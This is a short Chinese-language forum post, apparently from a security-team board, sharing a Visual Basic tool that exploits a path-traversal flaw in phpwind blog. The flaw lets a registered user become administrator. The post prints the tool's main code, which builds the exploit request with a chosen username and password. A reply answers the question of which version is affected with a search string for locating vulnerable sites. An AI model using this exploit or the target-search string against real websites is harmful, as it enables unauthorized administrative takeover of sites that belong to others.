[原创]VB写的phpwindblog漏洞利用工具
文章作者:fhod信息来源:邪恶八进制信息安全团队
玄猫发布的一个漏洞利用工具..后来经过抓包分析..发现其实不用修改管理员密码..直接就可以把注册的用户提升为管理员...接着用VB写了个程序.方便使用.
具体利用程序里有使用说明.
程序主要代码为
[code]
Private Sub Command1_Click()
WebBrowser1.Navigate (url.Text + "/user_index.php?action=../admin/manager&job=submit&username=" + user.Text + "&password=" + pass.Text + "&check_pwd=" + pass.Text)
WebBrowser1.Visible = True
End Sub
Private Sub Command2_Click()
End
End Sub
Private Sub shuoming_Click()
Form2.Show
End Sub
[/code]
以下是程序运行后的截图:
[attach]2479[/attach]
[attach]2480[/attach]
PS:本人在EST的处女贴~~~ [quote][b]这里是引用第[/b][color=#ff0000][3 楼][/color][b]的[color=#000066]starjason[/color]于[/b]2006-08-29 23:16[b]发表的:[/b]
针对什么版本啊?[/quote]
百度
Powered by PHPWind v3.0.0 [s:35]
页:
[1]